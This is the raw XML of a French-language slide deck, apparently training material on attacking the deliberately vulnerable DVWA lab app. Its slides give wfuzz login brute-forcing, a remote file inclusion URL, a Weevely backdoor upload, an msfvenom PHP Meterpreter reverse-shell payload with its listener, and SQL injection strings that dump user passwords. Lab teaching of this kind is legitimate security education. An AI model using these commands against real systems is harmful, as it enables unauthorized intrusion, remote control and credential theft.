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5" r:id="rId3"/>
    <p:sldId id="274" r:id="rId4"/>
    <p:sldId id="257" r:id="rId5"/>
    <p:sldId id="258" r:id="rId6"/>
    <p:sldId id="259" r:id="rId7"/>
    <p:sldId id="260" r:id="rId8"/>
    <p:sldId id="261" r:id="rId9"/>
    <p:sldId id="264" r:id="rId10"/>
    <p:sldId id="284" r:id="rId11"/>
    <p:sldId id="272" r:id="rId12"/>
    <p:sldId id="267" r:id="rId13"/>
    <p:sldId id="268" r:id="rId14"/>
    <p:sldId id="266" r:id="rId15"/>
    <p:sldId id="276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63" r:id="rId25"/>
    <p:sldId id="269" r:id="rId26"/>
    <p:sldId id="270" r:id="rId27"/>
    <p:sldId id="271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8909" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="56" d="100"/>
          <a:sy n="56" d="100"/>
        </p:scale>
        <p:origin x="26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7D4BC-9025-4705-B83C-D3E2FD6AD2C6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8C553-6F12-4AB2-A149-3DA3E7AB0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40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sec.com/metasploit-unleashed/file-inclusion-vulnerabilities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C553-6F12-4AB2-A149-3DA3E7AB04D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871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hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>File Inclusion </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Vulnerabilities</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Unleashed</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>www.offsec.com/metasploit-unleashed/file-inclusion-vulnerabilities/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8C553-6F12-4AB2-A149-3DA3E7AB04D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278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https://mohammadm2.medium.com/rfi-af90905c8161</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>https://www.hackingarticles.in/comprehensive-guide-on-remote-file-inclusion-rfi/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C553-6F12-4AB2-A149-3DA3E7AB04D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181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C553-6F12-4AB2-A149-3DA3E7AB04D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738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C553-6F12-4AB2-A149-3DA3E7AB04D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087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/>
              <a:t>http://altoro.testfire.net</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0"/>
              <a:t>http://altoromutual.com:8080/login.jsp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C553-6F12-4AB2-A149-3DA3E7AB04D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783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C553-6F12-4AB2-A149-3DA3E7AB04D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979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https://www.youtube.com/watch?v=2OPVViV-GQk</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>https://www.youtube.com/watch?v=xiUTqnI6xk8&amp;pp=ygUdbmV0d29yayBjaHVjayArIHNxbCBpbmplY3Rpb24%3D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C553-6F12-4AB2-A149-3DA3E7AB04D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948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C553-6F12-4AB2-A149-3DA3E7AB04D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345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C553-6F12-4AB2-A149-3DA3E7AB04D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652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http://portswigger.net/web-security/sql-injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>https://medium.com/@aayushtiruwa120/dvwa-sql-injection-91b4efb683e4</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>https://medium.com/@cybersec.ayansharma/sql-injection-on-metasploitable-2-using-sqlmap-d50bd1359ed8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C553-6F12-4AB2-A149-3DA3E7AB04D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102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https://tremblinguterus.blogspot.com/2020/11/metasploitable-2-walkthrough-part-iv.html</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>https://www.rapid7.com/blog/post/2022/10/07/metasploit-weekly-wrap-up-179/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C553-6F12-4AB2-A149-3DA3E7AB04D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345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C553-6F12-4AB2-A149-3DA3E7AB04D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525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baseline="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>https://hub.docker.com/r/intel/tadk-waf</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>https://github.com/theonemule/docker-waf</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>https://github.com/owasp-modsecurity/ModSecurity/wiki/Reference-Manual-%28v3.x%29</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>https://hub.docker.com/r/owasp/modsecurity-crs/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>https://hub.docker.com/r/wallarm/gotestwaf</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>https://hub.docker.com/r/intel/tadk-waf</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Ubuntu </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>bionic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> : </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>http://www.youtube.com/watch?v=5eRxOYbaIEI</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>https://www.linode.com/docs/guides/securing-nginx-with-modsecurity/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C553-6F12-4AB2-A149-3DA3E7AB04D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184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https://medium.com/@allypetitt/5-ways-i-bypassed-your-web-application-firewall-waf-43852a43a1c2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/XSS%20Injection/README.md#filter-bypass-and-exotic-payloads</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>https://github.com/kh4sh3i/WAF-Bypass</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>https://book.hacktricks.xyz/v/fr/network-services-pentesting/pentesting-web/waf-bypass</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://github.com/nemesida-waf/waf-bypass</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>https://book.hacktricks.xyz/pentesting-web/proxy-waf-protections-bypass</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Interessant</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>tested</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR"/>
              <a:t>) : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>https://www.howtoforge.com/install-modsecurity-3-with-nginx-on-ubuntu-22-04/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>https://medium.com/@sangjinn/verifying-client-ip-address-in-linode-nodebalancer-environment-using-proxy-protocol-5d012aadddd9</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>https://medium.com/codelogicx/securing-nginx-server-using-modsecurity-oswaf-7ba79906d84c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C553-6F12-4AB2-A149-3DA3E7AB04D3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5561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https://medium.com/@evidencemonday/exploiting-vulnerabilities-in-dvwa-89b75c145d33</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Voir aussi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>videos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0"/>
              <a:t> de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0" err="1"/>
              <a:t>cryptocat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0"/>
              <a:t> sur </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0" err="1"/>
              <a:t>youtube</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" baseline="0" dirty="0"/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C553-6F12-4AB2-A149-3DA3E7AB04D3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51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username</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> : admin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>pasword</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>password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C553-6F12-4AB2-A149-3DA3E7AB04D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515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wfuzz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"incorrect" -c -w pass.txt  -b 'security=low; PHPSESSID=45d6705ed20a045ea8a3fcf3a51fe7d8' 'http://192.168.32.129/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/vulnerabilities/brute/?username=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admin&amp;password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FUZZ&amp;Login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=Login'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wfuzz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"incorrect" -c -w pass.txt  -b 'security=medium; PHPSESSID=45d6705ed20a045ea8a3fcf3a51fe7d8' 'http://192.168.32.129/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/vulnerabilities/brute/?username=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admin&amp;password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FUZZ&amp;Login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=Login'</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p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wfuzz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"incorrect" -c -w pass.txt  -b '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=medium; PHPSESSID=45d6705ed20a045ea8a3fcf3a51fe7d8' 'http://192.168.32.129/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dvwa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vulnerabilities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/brute/?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username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admin&amp;password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FUZZ&amp;Login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Login&amp;user_token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=****‘</a:t>
            </a:r>
          </a:p>
          <a:p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C553-6F12-4AB2-A149-3DA3E7AB04D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10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C553-6F12-4AB2-A149-3DA3E7AB04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701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C553-6F12-4AB2-A149-3DA3E7AB04D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545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C553-6F12-4AB2-A149-3DA3E7AB04D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291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C553-6F12-4AB2-A149-3DA3E7AB04D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217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https://www.linkedin.com/pulse/local-file-inclusionlfi-vulnerability-remote-files-access-asif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8C553-6F12-4AB2-A149-3DA3E7AB04D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82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8C71-3049-4C09-B3EF-913191D70451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DF67-1AFF-41DB-8E45-856D9CDD3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37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8C71-3049-4C09-B3EF-913191D70451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DF67-1AFF-41DB-8E45-856D9CDD3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00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8C71-3049-4C09-B3EF-913191D70451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DF67-1AFF-41DB-8E45-856D9CDD3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29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8C71-3049-4C09-B3EF-913191D70451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DF67-1AFF-41DB-8E45-856D9CDD3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00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8C71-3049-4C09-B3EF-913191D70451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DF67-1AFF-41DB-8E45-856D9CDD3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38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8C71-3049-4C09-B3EF-913191D70451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DF67-1AFF-41DB-8E45-856D9CDD3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85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8C71-3049-4C09-B3EF-913191D70451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DF67-1AFF-41DB-8E45-856D9CDD3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17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8C71-3049-4C09-B3EF-913191D70451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DF67-1AFF-41DB-8E45-856D9CDD3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2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8C71-3049-4C09-B3EF-913191D70451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DF67-1AFF-41DB-8E45-856D9CDD3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98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8C71-3049-4C09-B3EF-913191D70451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DF67-1AFF-41DB-8E45-856D9CDD3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36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58C71-3049-4C09-B3EF-913191D70451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DF67-1AFF-41DB-8E45-856D9CDD3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43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58C71-3049-4C09-B3EF-913191D70451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7DF67-1AFF-41DB-8E45-856D9CDD3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55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rfortech.wordpress.com/2019/09/01/hacking-tools-list-you-should-know/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://0xsp.com/offensive/red-teaming-toolkit-collec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tW0rK1le3r/PENTESTING-BIBL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OWASP INJECTION (DVWA)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54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FCB0B3-DB19-AE56-B988-DC4AD345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ACTIVATION RFI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CBE7C7-261A-112E-C3D3-F8F811533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72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RFI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Remonter un fichier vers le serveur pour être </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>executé</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> via </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>php.include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5377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11353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/>
              <a:t> python -m </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0" err="1"/>
              <a:t>http.server</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0"/>
              <a:t> 9000</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0"/>
              <a:t>Lancer : </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0"/>
              <a:t>192.168.113.132/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0" err="1"/>
              <a:t>dvwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0" err="1"/>
              <a:t>vulnerabilities</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0"/>
              <a:t>/fi/?page=http://192.168.113.133:9000/up.php</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3599388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FILE UPLOAD AVEC WEEVLY BACKDOOR</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="510988" y="1690688"/>
            <a:ext cx="1137621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weevely</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t> generate </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1"/>
              <a:t>abcxyz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1"/>
              <a:t>up.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="3200" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" sz="3200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="3200" dirty="0"/>
              <a:t>http://192.168.113.132/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="3200" dirty="0" err="1"/>
              <a:t>dvwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="3200" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="3200" dirty="0" err="1"/>
              <a:t>vulnerabilities</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="3200" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="3200" dirty="0" err="1"/>
              <a:t>upload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="3200" dirty="0"/>
              <a:t>/../../</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="3200" dirty="0" err="1"/>
              <a:t>hackable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="3200" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="3200" dirty="0" err="1"/>
              <a:t>uploads</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="3200" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="3200" dirty="0" err="1"/>
              <a:t>up.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="3200" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" sz="3200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="3200" dirty="0"/>
              <a:t>Pour s’y connecter : </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="3200" dirty="0" err="1"/>
              <a:t>weevely</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="3200" dirty="0"/>
              <a:t> http://192.168.113.132/dvwa/hackable/uploads/up.php </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="3200" dirty="0" err="1"/>
              <a:t>abcxyz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR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588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E7264F5-4E97-0FE9-B26F-6CD544C77297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1832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File Upload : (upload un fichier malvaillant et executé par le serveur)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05117" y="1690688"/>
            <a:ext cx="1158688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u="sng" dirty="0"/>
              <a:t>Coté malware : </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0" err="1"/>
              <a:t>msfvenom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0"/>
              <a:t> -p </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0" err="1"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0" err="1"/>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0" err="1"/>
              <a:t>reverse_tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0"/>
              <a:t> LHOST=192.168.113.133 LPORT=4444 -f </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0" err="1"/>
              <a:t>raw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0"/>
              <a:t> &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0" err="1"/>
              <a:t>up.php</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" u="sng" dirty="0"/>
              <a:t>Coté </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" u="sng" dirty="0" err="1"/>
              <a:t>listener</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" u="sng" dirty="0"/>
              <a:t> : </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0" err="1"/>
              <a:t>msfconsole</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0"/>
              <a:t>use exploit/multi/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0" err="1"/>
              <a:t>handler</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0"/>
              <a:t>Set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0" err="1"/>
              <a:t>payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0" err="1"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0" err="1"/>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0" err="1"/>
              <a:t>reverse_tcp</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0"/>
              <a:t>Set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0" err="1"/>
              <a:t>lport</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0"/>
              <a:t> 4444</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0"/>
              <a:t>Set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0" err="1"/>
              <a:t>lhost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0"/>
              <a:t> 192.168.113.133</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0"/>
              <a:t>run </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4174859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INJECTION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HTML</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>JAVASCRIPT </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>CSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR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10014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SQL Injection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68389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6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SQL Injection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95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91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SQL Injection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8405"/>
            <a:ext cx="10215282" cy="526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30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SQL Injection DVWA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100" y="2020094"/>
            <a:ext cx="3695700" cy="13335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372" y="5016500"/>
            <a:ext cx="78581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8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Version antérieure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Voir lien</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="566170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SQL Injection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Tester</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>‘ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>order</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> by 1#</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>‘ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>order</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> by 2#</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>‘ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>order</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> by 3#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‘UNION SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>username</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>users</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>--</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>‘UNION SELECT user, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>users</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>--</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>‘UNION SELECT user, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>users</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>#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589" y="-12700"/>
            <a:ext cx="37147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74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SQL INJECTION AMELIORATION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des modes inspections (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>developpeurs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Utilisation de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>sqlmap</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Utilisation de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>burpsuite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> et OWASP ZAP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
